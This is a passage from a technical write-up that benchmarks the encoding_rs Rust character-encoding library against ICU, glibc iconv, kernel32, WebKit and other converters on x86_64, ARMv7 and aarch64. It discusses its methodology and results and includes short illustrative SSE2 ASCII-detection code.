  • Except for kernel32, the measurements exclude the initialization and destruction of the converter. This is to the advantage of uconv, ICU and glibc, which perform more work during converter initialization than encoding_rs does. kernel32 does not expose converter initialization as a distinct operation, and it’s not clear whether there is an initialization cost the first time a given converter is used or every time.

  • When converting to and from UTF-8, in the comparison with rust-encoding, rust-encoding targets String and Vec<u8> while encoding_rs uses Cows. In this case, instead of trying to make the comparison fair by making encoding_rs make a useless copy, the comparison demonstrates the benefits of conditionally copy-free Rust API design.

  • The WebKit API shows traces of Qt’s converter design. This includes always allocating a buffer on the heap for output. As a result, the WebKit numbers include the allocation and deallocation of the output buffer but those numbers are compared with encoding_rs numbers that don’t include buffer allocation and deallocation.

  • Since the reference libraries do not fully conform to the Encoding Standard, the work being performed isn’t exactly the same. Instead, the closest approximation of a given legacy encoding is used. Even the error handling can differ: WebKit’s UTF-16BE and UTF-16LE converters don’t check for unpaired surrogates and kernel32 shows unpolished behavior on errors.

  • Arguably, UTF-8 isn’t the native application-side Unicode representation of glibc. However, since e.g. glib (the infrastructure library used by GTK+) uses UTF-8 as its native application-side Unicode representation and wraps glibc for the conversions from external encodings, testing glibc’s performance to and from UTF-8 is relevant to how glibc is used even if arguably unfair.

  • When encoding from UTF-8, encoding_rs and rust-encoding assume the input is valid, but glibc does not.

Reading the Tables

The columns are grouped into decode results and into encode results. Those groups, in turn, are grouped into using UTF-16 as the internal Unicode representation and into using UTF-8 as the internal Unicode representation. Both cases are supported by encoding_rs but the libraries being compared with support one or the other. Then there is a column for each library whose performance is being compared with.

  • uconv is Gecko’s old encoding converter library with the numbers run in November 2016 on Ubuntu 16.04 with Ubuntu-provided GCC and before Spectre/Meltdown kernel mitigations. It would be fair to recompile with current clang, but I deemed it too much effort to get 2016 Gecko building on a 2018 system.
  • ICU is ICU 60 as shipped on Ubuntu 18.04.
  • kernel32 is kernel32.dll included in Windows 10 1803.
  • WebKit is WebKitGTK+ 2.22.2 built with the default options (-O2) with GCC 7.3.0 on Ubuntu 18.04.
  • kewb is Bob Steagall’s SSE2-accelerated converter presented at CppCon2018 built with clang at -O3.
  • stdlib is Rust’s standard library.
  • rust-encoding is rust-encoding 0.2.33.
  • glibc is glibc’s iconv as shipped on Ubuntu 18.04.

Each row names a language and an external encoding to convert from or to. The numbers are encoding_rs speed factors relative to the library named in the column. 2.0 means that encoding_rs is twice as fast as the reference library named in the column header. 0.5 means that the reference library named in the column header is twice as fast as encoding_rs. 0.00 means that encoding_rs is relatively very slow (still user-perceptibly fast enough for the form submission use case in a browser) and the non-zero decimals didn’t show up in the second decimal position.

Benchmark Results

encoding_rs and rust-encoding are built with Rust’s default optimization level opt_level=3 even though encoding_rs in Firefox is built at opt_level=2 for the time being. encoding_rs in Firefox is expected to switch to opt_level=3 soon. For these benchmarks, at least on x86_64 Haswell, there is no practical difference between opt_level=2 and opt_level=3 being applied to encoding_rs. However, previously there have been issues with opt_level=2 that I would rather not have investigated, so I am really looking forward to using opt_level=3 in the Gecko context. Also kewb is built at -O3. The Rust version was 1.32.0-nightly (9fefb6766 2018-11-13).

In all cases, the default rustc optimization target for a given instruction set architecture was used. That is, e.g. the Haswell numbers mean running the code compiled for the generic x86_64 target on a Haswell chip and do not mean asking the compiler to optimize for Haswell specifically.

x86_64 Intel Core i7-4770 @ 3.40 GHz (Haswell, desktop)

encoding_rs uses SSE2 explicitly. Since SSE2 is part of the x86_64 baseline instruction set, other software is eligible for SSE2 autovectorization or to enable explicit SSE2 parts if they have them. At least uconv had an explicit SSE2 code path for ASCII in the UTF-8 to UTF-16 decoder.

Speed-factor columns from left to right:
Decode to UTF-16: uconv, ICU, kernel32, WebKit, kewb
Decode to UTF-8: stdlib, rust-encoding, glibc
Encode from UTF-16: uconv, ICU, kernel32, WebKit
Encode from UTF-8: rust-encoding, glibc

Arabic, UTF-8 2.47 2.68 1.26 1.77 0.98 1.37 4.68 5.73 0.85 0.85 0.75 1.15 4024.12 110.89
Czech, UTF-8 2.55 2.84 1.57 1.78 0.67 2.01 9.96 10.60 1.04 1.23 0.93 1.42 9055.00 104.12
German, UTF-8 3.36 5.95 2.77 2.90 1.03 2.14 22.60 19.19 3.43 4.14 1.71 5.10 3469.75 73.62
Greek, UTF-8 2.52 2.96 1.37 1.88 1.01 1.38 5.72 6.80 0.86 0.90 0.77 1.15 5492.50 105.05
English, UTF-8 2.79 8.57 3.65 3.66 1.14 1.82 61.74 31.99 7.46 11.07 3.76 14.20 632.38 69.89
JavaScript, UTF-8 11.42 4.77 0.81 1.05 1.58 30.02 45.80 13.84 5.20 17.84 682.12 63.83
French, UTF-8 2.82 4.20 2.06 2.16 0.77 1.80 14.54 13.80 1.25 1.54 0.87 1.84 14217.50 80.27
Hebrew, UTF-8 2.45 2.50 1.26 1.71 0.93 1.47 4.67 5.78 0.81 0.87 0.72 1.04 9654.38 113.19
Portuguese, UTF-8 2.94 4.91 2.33 2.44 0.86 1.85 17.65 15.90 1.89 2.30 1.06 2.77 5188.50 79.98
Russian, UTF-8 2.46 2.73 1.29 1.81 0.96 1.41 5.07 6.11 0.81 0.90 0.75 1.02 21188.00 109.55
Thai, UTF-8 3.11 3.99 1.67 2.06 1.18 1.59 10.15 10.38 1.09 1.47 1.06 1.41 16414.75 68.88
Turkish, UTF-8 2.47 2.53 1.47 1.70 0.67 2.04 8.93 9.74 1.01 1.19 0.89 1.35 10995.38 104.52
Vietnamese, UTF-8 2.37 2.31 1.31 1.63 0.78 1.90 6.62 7.58 0.90 1.01 0.84 1.08 27145.50 145.72
Simplified Chinese, UTF-8 3.02 3.40 1.67 1.96 1.06 1.90 8.93 9.49 1.15 1.58 1.03 1.55 3575.00 75.42
Traditional Chinese, UTF-8 3.05 3.42 1.68 1.96 1.07 1.90 8.98 9.54 1.15 1.58 1.03 1.55 3600.25 74.89
Japanese, UTF-8 3.26 3.47 1.66 1.99 1.15 1.94 8.40 9.20 1.14 1.60 1.07 1.56 2880.12 71.67
Korean, UTF-8 2.98 2.85 1.54 1.89 1.01 1.90 6.48 7.56 1.10 1.39 0.89 1.33 3929.12 108.69
Arabic, windows-1256 1.62 1.12 0.82 5.15 4.03 3.27 0.37 0.05 0.72 0.86
Czech, windows-1250 2.49 1.71 1.25 7.87 7.00 2.71 0.65 0.12 1.01 1.12
German, windows-1252 7.25 4.99 3.66 25.07 22.76 32.31 6.82 1.64 12.89 12.02
Greek, windows-1253 2.12 1.46 1.07 6.36 5.01 7.03 1.43 0.20 2.06 2.00
English, windows-1252 9.96 6.85 5.02 47.65 43.28 96.70 20.12 5.10 58.56 55.80
French, windows-1252 4.29 2.95 2.16 13.91 12.51 10.67 2.33 0.53 4.24 4.04
Hebrew, windows-1255 1.96 1.07 0.78 5.19 4.88 7.05 1.34 0.18 1.98 1.78
Portuguese, windows-1252 5.46 3.75 2.75 18.32 16.51 17.36 3.78 0.87 6.53 6.14
Russian, windows-1251 1.63 1.12 0.82 5.21 4.00 4.97 1.36 0.19 2.04 1.91
Thai, windows-874 3.36 2.31 1.69 5.83 4.70 3.99 0.59 0.10 1.18 1.03
Turkish, windows-1254 2.28 1.57 1.15 7.02 6.21 4.61 0.84 0.16 1.32 1.48
Simplified Chinese, gb18030 3.68 3.64 5.04 6.40 4.73 0.23 0.01 0.02 0.01 0.01
Traditional Chinese, Big5 3.24 3.08 1.87 6.13 4.36 1.29 0.01 0.00 0.01 0.02
Japanese, EUC-JP 2.85 2.79 1.69 5.17 3.78 1.26 0.02 0.01 0.03 0.17
Japanese, ISO-2022-JP 0.94 1.80 1.07 2.91 2.10 0.61 0.06 0.06 0.03 0.15
Japanese, Shift_JIS 1.72 2.35 1.42 4.66 3.41 0.62 0.01 0.01 0.03 0.03
Korean, EUC-KR 39.64 3.47 2.24 5.81 4.08 84.85 0.31 0.20 0.56 0.53
x-user-defined 12.87 25.29 3.03
Arabic, UTF-16LE 13.48 6.33 4.17 4.74 3.47
Czech, UTF-16LE 13.54 6.33 4.17 7.20 5.33
German, UTF-16LE 13.48 6.34 4.18 14.87 10.86
Greek, UTF-16LE 13.49 6.33 4.18 5.70 4.16
English, UTF-16LE 13.43 6.33 4.17 32.86 24.17
French, UTF-16LE 13.51 6.33 4.17 11.58 8.43
Hebrew, UTF-16LE 13.50 6.33 4.18 4.55 3.38
Portuguese, UTF-16LE 13.50 6.33 4.17 13.66 9.94
Russian, UTF-16LE 13.52 6.33 4.17 5.00 3.63
Thai, UTF-16LE 13.33 6.33 4.17 8.40 6.03
Turkish, UTF-16LE 13.42 6.33 4.17 6.47 4.83
Vietnamese, UTF-16LE 13.51 6.33 4.17 5.48 4.13
Simplified Chinese, UTF-16LE 13.52 6.33 8.38 7.60 5.59
Traditional Chinese, UTF-16LE 13.48 6.33 8.38 7.58 5.58
Japanese, UTF-16LE 13.54 6.33 4.18 6.69 4.90
Korean, UTF-16LE 13.84 6.49 4.29 5.49 4.14
Arabic, UTF-16BE 11.30 5.29 3.49 4.17 3.11
Czech, UTF-16BE 11.15 5.29 3.49 6.59 5.04
German, UTF-16BE 11.32 5.29 3.49 12.85 9.79
Greek, UTF-16BE 11.30 5.28 3.49 5.00 3.73
English, UTF-16BE 11.26 5.29 3.48 26.03 20.02
French, UTF-16BE 11.28 5.29 3.48 10.09 7.70
Hebrew, UTF-16BE 11.26 5.28 3.49 4.04 3.03
Portuguese, UTF-16BE 11.29 5.29 3.49 11.77 8.98
Russian, UTF-16BE 11.27 5.29 3.48 4.43 3.27
Thai, UTF-16BE 11.22 5.29 3.48 7.63 5.63
Turkish, UTF-16BE 11.31 5.29 3.49 5.97 4.60
Vietnamese, UTF-16BE 11.29 5.29 3.48 5.03 3.87
Simplified Chinese, UTF-16BE 11.27 5.29 7.00 6.85 5.17
Traditional Chinese, UTF-16BE 11.31 5.29 7.00 6.84 5.16
Japanese, UTF-16BE 11.31 5.29 3.49 6.08 4.55
Korean, UTF-16BE 11.44 5.36 3.54 4.90 3.77

The above table shows the results with SIMD enabled for encoding_rs but without encode-specific data tables (beyond the 32 bits of encode-specific data for each single-byte encoding).

With indexable lookup tables for the CJK Unified Ideographs and Hangul Syllables Unicode blocks, but otherwise retaining the same encoder structure, encoding_rs performs CJK legacy encode like this:

Speed-factor columns from left to right:
Encode from UTF-16: uconv, ICU, kernel32
Encode from UTF-8: rust-encoding, glibc

Simplified Chinese, gb18030 24.53 0.74 2.42 0.97 0.80
Traditional Chinese, Big5 160.73 0.68 0.31 1.30 2.07
Japanese, EUC-JP 47.25 0.68 0.21 0.93 5.29
Japanese, ISO-2022-JP 20.81 1.99 2.10 0.94 4.56
Japanese, Shift_JIS 29.04 0.59 0.26 1.41 1.01
Korean, EUC-KR 372.45 1.36 0.90 2.15 2.05
ARMv7+NEON Exynos 5

Windows 10 is not available for this hardware, kewb is not optimized for ARM, and the browsers are excluded due to compilation problems. encoding_rs and rust-encoding are compiled with NEON enabled. Only encoding_rs uses NEON explicitly. Notably, NEON is less suited than SSE2 for feeding results back into control flow, so NEON is not used for validating ASCII; the comparison with the Rust standard library therefore ends up being an ALU vs. ALU comparison.

Speed-factor columns from left to right:
Decode to UTF-16: ICU
Decode to UTF-8: stdlib, rust-encoding, glibc
Encode from UTF-16: ICU
Encode from UTF-8: rust-encoding, glibc

Arabic, UTF-8 2.15 1.21 2.71 5.28 0.93 5974.90 164.96
Czech, UTF-8 1.96 1.26 4.19 7.27 1.13 10653.25 75.24
German, UTF-8 2.89 1.20 7.13 11.32 2.54 5299.90 57.87
Greek, UTF-8 2.29 1.17 3.10 5.96 0.95 7891.35 159.49
English, UTF-8 4.25 1.07 13.82 15.11 4.66 2038.65 57.17
JavaScript, UTF-8 5.15 1.01 6.97 18.02 5.63 2120.60 57.11
French, UTF-8 2.73 1.22 7.95 9.88 1.61 16413.40 61.95
Hebrew, UTF-8 2.08 1.26 2.77 5.36 0.96 13160.95 93.50
Portuguese, UTF-8 2.80 1.22 8.66 10.39 1.87 6767.35 60.16
Russian, UTF-8 2.22 1.20 3.45 5.36 0.97 28588.75 98.30
Thai, UTF-8 3.32 1.41 6.11 9.33 1.84 28600.00 143.92
Turkish, UTF-8 1.84 1.25 3.78 6.74 1.13 12253.10 73.99
Vietnamese, UTF-8 1.76 1.32 4.06 6.11 1.06 29650.00 111.16
Simplified Chinese, UTF-8 2.46 1.43 4.09 7.94 1.82 5748.35 238.95
Traditional Chinese, UTF-8 2.46 1.43 4.16 8.01 1.82 5872.95 171.07
Japanese, UTF-8 2.48 1.45 3.79 8.92 1.88 5498.10 168.30
Korean, UTF-8 2.02 1.40 3.21 6.49 1.25 5938.90 198.42
Arabic, windows-1256 0.58 3.01 3.66 0.36 0.96 1.08
Czech, windows-1250 0.96 4.11 6.73 0.54 1.02 1.20
German, windows-1252 1.72 5.64 14.03 2.89 6.06 7.14
Greek, windows-1253 0.73 3.03 4.65 1.09 2.49 2.26
English, windows-1252 2.66 6.79 27.79 5.08 20.01 24.02
French, windows-1252 1.39 4.69 9.69 1.80 3.24 3.86
Hebrew, windows-1255 0.58 2.68 4.42 1.14 2.58 2.22
Portuguese, windows-1252 1.64 5.61 12.78 2.16 4.09 4.77
Russian, windows-1251 0.60 3.15 3.79 1.16 2.65 2.35
Thai, windows-874 0.98 3.64 5.88 0.60 1.87 2.46
Turkish, windows-1254 0.87 3.85 6.07 0.65 1.22 1.48
Simplified Chinese, gb18030 1.74 4.08 4.02 0.01 0.01 0.02
Traditional Chinese, Big5 1.73 4.57 4.40 0.01 0.02 0.04
Japanese, EUC-JP 1.61 3.91 4.26 0.03 0.04 0.22
Japanese, ISO-2022-JP 1.96 2.12 1.98 0.09 0.04 0.20
Japanese, Shift_JIS 1.41 3.46 3.77 0.02 0.04 0.06
Korean, EUC-KR 1.73 5.75 4.59 0.29 0.57 0.51
x-user-defined 2.44
Arabic, UTF-16LE 4.64 2.64 3.64
Czech, UTF-16LE 4.65 3.51 5.71
German, UTF-16LE 4.64 4.61 9.66
Greek, UTF-16LE 4.73 2.87 4.19
English, UTF-16LE 4.51 5.52 13.75
French, UTF-16LE 3.03 4.07 7.10
Hebrew, UTF-16LE 4.75 2.60 3.57
Portuguese, UTF-16LE 4.61 5.19 9.23
Russian, UTF-16LE 4.59 3.12 3.82
Thai, UTF-16LE 3.78 3.66 6.59
Turkish, UTF-16LE 4.61 3.33 5.22
Vietnamese, UTF-16LE 4.59 3.54 4.80
Simplified Chinese, UTF-16LE 4.61 3.32 5.88
Traditional Chinese, UTF-16LE 4.61 3.32 5.87
Japanese, UTF-16LE 4.74 3.02 5.35
Korean, UTF-16LE 4.73 4.24 4.59
Arabic, UTF-16BE 2.85 2.30 3.11
Czech, UTF-16BE 2.84 3.02 4.68
German, UTF-16BE 2.84 3.94 7.49
Greek, UTF-16BE 2.93 2.50 3.55
English, UTF-16BE 2.79 4.70 10.07
French, UTF-16BE 2.05 3.38 5.37
Hebrew, UTF-16BE 2.93 2.27 3.06
Portuguese, UTF-16BE 2.87 4.44 7.19
Russian, UTF-16BE 2.83 2.75 3.24
Thai, UTF-16BE 2.49 3.09 5.33
Turkish, UTF-16BE 2.83 2.85 4.30
Vietnamese, UTF-16BE 2.85 3.03 3.98
Simplified Chinese, UTF-16BE 2.83 2.85 4.84
Traditional Chinese, UTF-16BE 2.82 2.87 4.84
Japanese, UTF-16BE 2.94 2.62 4.52
Korean, UTF-16BE 2.93 3.51 3.88
aarch64 ThunderX

I lack access to Windows 10 on aarch64, kewb is not optimized for aarch64, either, and browsers were excluded for compilation problems. As with x86_64, SIMD is part of the baseline compiler target instruction set on aarch64.

While I was not paying attention, ALU code for ASCII validation has gained speed relative to SIMD-based ASCII validation. I suspect this might be due to LLVM updates since LLVM 4. For this reason, I have moved aarch64 to use ALU code for ASCII validation pending more investigation of how to fix the SIMD code.

These numbers are from ThunderX, which is a server chip. Furthermore, this is the first-generation ThunderX, which is an in-order design. Benchmarking on phones does not make sense, because their clock speeds vary all the time due to thermal throttling, so benchmark results are not repeatable. Moreover, the thermal throttling may be rather fine-grained, so it is not feasible to identify throttling by looking for a clear 50% drop as is feasible e.g. with the Raspberry Pi 3. The problem with ThunderX and the Raspberry Pi 3 is that they use cores with in-order designs while high-end phones use more advanced out-of-order designs. It is quite frustrating that there is no good information about which non-phone computers with aarch64 chips are able to hold a stable clock speed when running a compute benchmark for the purpose of testing small changes in implementation details. A stable clock speed is not a characteristic of an ARM hardware and kernel combination that gets advertised or talked about on forums. (In the ARMv7+NEON case, I just happened to discover that a piece of hardware, a Samsung Chromebook 2 with Crouton, suited my needs.)

Speed-factor columns from left to right:
Decode to UTF-16: ICU
Decode to UTF-8: stdlib, rust-encoding, glibc
Encode from UTF-16: ICU
Encode from UTF-8: rust-encoding, glibc

Arabic, UTF-8 1.81 1.14 3.53 5.74 0.85 4358.21 43.56
Czech, UTF-8 1.63 1.19 5.72 7.97 1.00 7739.88 24.20
German, UTF-8 1.89 1.16 8.67 10.77 1.96 5448.46 20.42
Greek, UTF-8 1.91 1.16 4.16 6.55 0.88 6339.08 36.21
English, UTF-8 2.10 1.03 10.98 12.73 2.57 2585.88 19.28
JavaScript, UTF-8 2.49 1.01 9.24 17.81 4.18 3874.54 39.83
French, UTF-8 1.79 1.17 7.59 10.03 1.48 14883.29 21.76
Hebrew, UTF-8 1.77 1.16 3.56 5.82 0.86 10102.21 30.73
Portuguese, UTF-8 1.88 1.16 8.43 10.46 1.64 6257.67 20.99
Russian, UTF-8 1.90 1.17 3.73 6.08 0.91 22567.83 29.29
Thai, UTF-8 2.28 1.05 4.43 6.74 1.29 29472.83 24.38
Turkish, UTF-8 1.59 1.21 5.35 7.63 1.02 9224.92 23.80
Vietnamese, UTF-8 1.55 1.12 4.27 6.33 0.84 20106.71 26.71
Simplified Chinese, UTF-8 1.98 1.19 4.67 6.83 1.27 5704.42 35.09
Traditional Chinese, UTF-8 1.97 1.18 4.62 6.77 1.28 5706.46 35.22
Japanese, UTF-8 2.05 1.18 4.04 6.10 1.31 5963.42 76.90
Korean, UTF-8 1.81 1.18 3.89 5.89 0.93 4173.88 37.93
Arabic, windows-1256 1.35 4.26 3.29 0.44 0.86 1.00
Czech, windows-1250 1.72 6.75 5.68 0.62 1.07 1.12
German, windows-1252 2.12 9.87 8.33 3.17 6.46 6.71
Greek, windows-1253 1.50 4.93 3.87 1.26 1.74 1.56
English, windows-1252 2.32 12.30 10.39 4.28 11.15 11.59
French, windows-1252 1.98 8.72 7.36 2.38 4.23 4.36
Hebrew, windows-1255 1.34 4.32 4.09 1.26 1.73 1.36
Portuguese, windows-1252 2.08 9.60 8.04 2.68 4.98 5.15
Russian, windows-1251 1.37 4.37 3.43 1.27 1.76 1.52
Thai, windows-874 1.69 5.04 4.11 0.82 1.33 1.14
Turkish, windows-1254 1.65 6.34 5.30 0.80 1.37 1.45
Simplified Chinese, gb18030 1.93 6.94 3.22 0.01 0.01 0.01
Traditional Chinese, Big5 1.92 5.65 3.65 0.01 0.01 0.02
Japanese, EUC-JP 1.86 6.16 3.07 0.02 0.04 0.19
Japanese, ISO-2022-JP 1.88 2.95 1.60 0.05 0.04 0.21
Japanese, Shift_JIS 1.69 5.21 3.08 0.02 0.04 0.03
Korean, EUC-KR 1.98 6.07 3.36 0.30 0.59 0.46
x-user-defined
Arabic, UTF-16LE 3.27 4.40 3.50
Czech, UTF-16LE 3.27 6.03 4.74
German, UTF-16LE 3.26 7.75 6.02
Greek, UTF-16LE 3.26 5.07 3.98
English, UTF-16LE 3.24 9.22 7.18
French, UTF-16LE 3.22 7.25 5.74
Hebrew, UTF-16LE 3.26 4.41 3.50
Portuguese, UTF-16LE 3.29 7.90 6.16
Russian, UTF-16LE 3.25 4.72 3.73
Thai, UTF-16LE 3.31 5.77 4.73
Turkish, UTF-16LE 3.27 5.75 4.55
Vietnamese, UTF-16LE 3.30 5.11 4.21
Simplified Chinese, UTF-16LE 3.26 5.79 4.59
Traditional Chinese, UTF-16LE 3.26 5.78 4.58
Japanese, UTF-16LE 3.26 5.34 4.24
Korean, UTF-16LE 3.28 4.90 3.89
Arabic, UTF-16BE 2.56 3.82 2.83
Czech, UTF-16BE 2.56 4.94 3.60
German, UTF-16BE 2.57 6.38 4.64
Greek, UTF-16BE 2.57 4.40 3.21
English, UTF-16BE 2.56 7.47 5.48
French, UTF-16BE 2.51 5.82 4.36
Hebrew, UTF-16BE 2.57 3.82 2.82
Portuguese, UTF-16BE 2.54 6.42 4.64
Russian, UTF-16BE 2.58 4.09 3.01
Thai, UTF-16BE 2.63 4.97 3.81
Turkish, UTF-16BE 2.56 4.71 3.44
Vietnamese, UTF-16BE 2.59 4.18 3.14
Simplified Chinese, UTF-16BE 2.56 4.92 3.64
Traditional Chinese, UTF-16BE 2.56 4.93 3.63
Japanese, UTF-16BE 2.57 4.61 3.43
Korean, UTF-16BE 2.57 4.17 3.06

Notable Observations

Rather expectedly, for ASCII on x86_64, SIMD is a lot faster than not using SIMD, and encode to legacy encodings without encode-oriented data tables is relatively slow (but, again, still user-perceptibly fast enough even on low-end hardware for the form submission use case for legacy encoders in a Web browser). Also, the naïve code structure that remains in the ISO-2022-JP decoder is slower than the kind of code structure that uses the program counter as part of the two-byte state tracking, which leads to more predictable branches.

glibc

Unlike the other libraries that convert to UTF-16 or UTF-8, glibc supports conversions from any encoding into any other by pivoting via UTF-32 on a per scalar value basis. This generality has a cost. I think the main take-away for application developers is that a standard library implementation covers a lot of functionality and not all those areas are optimized, so you should not assume that a library is fast at everything just because it is a core system library that has been around for a long time.

As noted earlier, in the “Apples to Oranges Comparisons”, when encoding from UTF-8, glibc treats the input as potentially invalid, but encoding_rs assumes validity, so when encoding from UTF-8 to UTF-8, the encoding_rs numbers are basically for memcpy but glibc inspects everything.

kernel32

In contrast, the Windows system converters have been seriously optimized for the encodings that are the default “ANSI code page” for some Windows locale. Notably, this benchmark tested gb18030 (not the default system code page for any locale) and not GBK (the default for Simplified Chinese), and gb18030 looks relatively slower than the code pages that are the default in some locale configuration of Windows. EUC-JP, however, looks well optimized in kernel32 despite it not being the default for any locale.

On the decode side, kernel32 is faster than encoding_rs for single-byte encodings for non-Latin scripts that use ASCII punctuation and spaces. However, for Thai and Latin scripts, encoding_rs is faster than kernel32 for single-byte encodings. This shows the cost of ASCII-acceleration when bouncing back to ASCII only for one or two bytes at a time and shows the downside of trying to limit the code footprint of encoding_rs by using the same code for all single-byte encodings with only the lookup table as a configurable variable.

On the encode side, kernel32 is extremely fast relative to other implementations for the encodings that are the default “ANSI code page” for some Windows locale (and for EUC-JP). Windows is not Open Source, so I haven’t seen the code, but from the performance characteristics it looks like kernel32 has a lookup table that can be directly indexed by a 16-bit Basic Multilingual Plane code point and that yields a pair of bytes that can be copied directly to the output. In microbenchmarks that don’t involve SIMD-acceleratable ASCII runs, it’s basically impossible to do better. It is hard to know what the cache effects of a maximally large lookup table are outside microbenchmarks, but the lookup table footprint just for CJK Unified Ideographs or just for Hangul Syllables is a large number of cache lines anyway.

Considering the use cases for the kernel32 converters, optimizing for extreme speed rather than small footprint makes sense. When pre-Unicode legacy apps are run on Windows, all calls to systems APIs that involve strings convert between the application-side “ANSI code page” and the system-side UTF-16. Typically, all apps run with the same legacy “ANSI code page”, so only the lookup table for one encoding needs to be actively accessed.

If the mission of the legacy encoders in encoding_rs was to provide maximally fast conversion to legacy encodings as opposed to providing correct conversion to legacy encodings with minimal footprint and just enough speed for the user not to complain about form submission, it would totally make sense to use tables directly indexable by a 16-bit Basic Multilingual Plane code point.

uconv

Overall, performance-wise the rewrite was an improvement. (More about UTF-16 to UTF-8 encode below.) As far as I can tell, the EUC-KR results for uconv are not a benchmark environment glitch; the EUC-KR implementation in uconv was just remarkably inefficient. The Big5 results say nothing about the original design of uconv. The uconv Big5 implementation being compared with is the one I wrote for Firefox 43, and that implementation already did away with encode-oriented data tables.

In encoding_rs, the ISO-2022-JP decoder uses a state variable while uconv was a bit faster thanks to using the program counter for state.

rust-encoding

As noted earlier in the “Apples to Oranges Comparisons” section, the numbers to and from UTF-8 show how much better borrowing is compared to copying when borrowing is possible. That is, encoding_rs borrows and rust-encoding copies.

ICU

ICU is an immensely useful and important library, but I am somewhat worried about the mentality that everyone should just standardize on ICU, and that no one can afford to rewrite ICU. In particular, I’m worried about the “just use ICU” approach entrenching UTF-16 as an in-memory representation of Unicode even more at a time when it’s increasingly clear that UTF-8 should be used not only as the interchange representation but also as the in-memory representation of Unicode. I hope the x86_64 and aarch64 results here encourage others to try to do better than ICU, (piece-wise, as the Rust ecosystem is doing) instead of just settling on ICU.

On ARMv7, encoding_rs performs worse than ICU for decoding non-windows-1252 single-byte encodings into UTF-16. This shows how encoding_rs’s design relies heavily on SIMD. ARMv7 has weaker SIMD functionality than x86, x86_64 or aarch64, so the split between ASCII and non-ASCII is a pessimization on ARMv7. In the x86_64 case the benefits of SSE2 for markup offset the downsides of the ASCII/non-ASCII handling split for natural language in the Wikipedia case. Fortunately, mobile browsing skews even more towards UTF-8 than the Web in general, migration from the affected encodings to UTF-8 is, anecdotally, even further along than migration to UTF-8 in general, and aarch64 is around the corner, so I think it isn’t worthwhile to invest effort or binary footprint into having a different design for ARMv7.

Encode from UTF-16 to UTF-8

While encoding_rs is a lot faster than the other libraries when encoding ASCII or almost-ASCII from UTF-16 to UTF-8, encoding_rs does worse than uconv, kernel32 and ICU in cases where there are only short runs of ASCII, typically one ASCII space, mixed with non-ASCII. This is consistent for Arabic, Greek, Hebrew and Russian, but relative to kernel32 this shows up also for Korean and for the Latin script: not just for Vietnamese (where the effect also shows up relative to uconv), Turkish and Czech, whose non-ASCII frequency is obviously high, but even for French.

This shows that the cost of switching between the ASCII fast path and the non-ASCII mode is higher for UTF-16 input than for single-byte input, which makes sense, since checking whether a SIMD vector of 16-bit units is in the Basic Latin range requires more SSE2 operations than checking a vector of 8-bit units. Considering that the benefit of the ASCII fast path is so large in the ASCII case, I ended up keeping the ASCII fast path, despite it being a pessimization, though, fortunately, not a huge one, for many languages.
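
As an illustration (not the actual code), deciding whether eight UTF-16 code units are all in the Basic Latin range takes several SSE2 operations, whereas sixteen bytes need only a single movemask:

    #[cfg(target_arch = "x86_64")]
    unsafe fn eight_units_are_basic_latin(v: std::arch::x86_64::__m128i) -> bool {
        use std::arch::x86_64::{
            _mm_and_si128, _mm_cmpeq_epi16, _mm_movemask_epi8, _mm_set1_epi16, _mm_setzero_si128,
        };
        // A UTF-16 code unit is in the Basic Latin range iff none of the bits
        // in 0xFF80 are set: an AND, a compare against zero and a movemask.
        let masked = _mm_and_si128(v, _mm_set1_epi16(0xFF80u16 as i16));
        let all_zero = _mm_cmpeq_epi16(masked, _mm_setzero_si128());
        _mm_movemask_epi8(all_zero) == 0xFFFF
    }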

Single-Byte Encode

Arabic, Hebrew, Greek and Russian are all written in non-Latin scripts that use ASCII spaces and punctuation. Why does Arabic encode perform so much worse? The reason is that the trick of identifying a contiguous dominant range of code points that maps by offset is not as good a fit for windows-1256 as it is for windows-1251, windows-1252, windows-1253, and windows-1255. While there is a range of Arabic characters that is contiguous in both Unicode and in windows-1256, some characters are not in that range. In contrast, all Hebrew consonants (the test data is not vocalized) map by offset between Unicode and windows-1255. The Cyrillic letters needed for Russian are likewise mappable by offset between Unicode and windows-1251 as are Greek lower-case letters (and some upper case ones) in windows-1253. Of course, the bulk of windows-1252 maps by offset.

The approach of offsetting one range does not work at all for windows-1250.

Considering that even the comparatively very slow legacy CJK encode is fast enough for Web browser use cases, non-ASCII single-byte encode is fast enough for those use cases even when the approach of offsetting a range does not work. The offset approach is just a very small-footprint tweak that is a nice bonus when it does work.

The Rust Standard Library

UTF-8 validation in the Rust standard library is very fast. It took quite a bit of effort to do better. (I hope that the code from encoding_rs gets upstreamed to the standard library eventually.) I managed to make encoding_rs faster than the standard library for input that’s not 100% ASCII first, but even when encoding_rs was faster than the standard library for English Wikipedia, the standard library was still faster for 100% ASCII. To make encoding_rs faster even in that case, it was necessary to introduce a two-tier approach even to the ASCII fast path. Assuming that the input is long enough to use SIMD at all, first the ASCII fast path processes 16 bytes with an unaligned SSE2 read. If that finds non-ASCII, the cost of having bounced to the SIMD path is still modest. If the first 16 bytes are ASCII, the fast path enters an even faster path that uses aligned reads and unrolls the loop by two.
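
The following is an illustrative sketch of the two-tier shape (greatly simplified and not the actual encoding_rs code, which also has to deal with writing output): a single unaligned 16-byte probe decides whether to enter an aligned loop unrolled by two, and a scalar tail finds the exact position of the first non-ASCII byte.

    #[cfg(target_arch = "x86_64")]
    fn ascii_prefix_length(bytes: &[u8]) -> usize {
        use std::arch::x86_64::{__m128i, _mm_load_si128, _mm_loadu_si128, _mm_movemask_epi8};
        const STRIDE: usize = 16;
        let len = bytes.len();
        let ptr = bytes.as_ptr();
        let mut i = 0usize;
        unsafe {
            // Tier one: a single unaligned 16-byte probe.
            if len >= STRIDE && _mm_movemask_epi8(_mm_loadu_si128(ptr as *const __m128i)) == 0 {
                // Tier two: the first 16 bytes were ASCII, so skip to the next
                // 16-byte boundary (the skipped bytes were already checked)
                // and continue with aligned loads, unrolled by two.
                i = STRIDE - (ptr as usize & (STRIDE - 1));
                while i + 2 * STRIDE <= len {
                    let a = _mm_load_si128(ptr.add(i) as *const __m128i);
                    let b = _mm_load_si128(ptr.add(i + STRIDE) as *const __m128i);
                    if _mm_movemask_epi8(a) != 0 || _mm_movemask_epi8(b) != 0 {
                        break;
                    }
                    i += 2 * STRIDE;
                }
            }
        }
        // Scalar tail: also finds the exact position after a SIMD hit.
        while i < len && bytes[i] < 0x80 {
            i += 1;
        }
        i
    }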

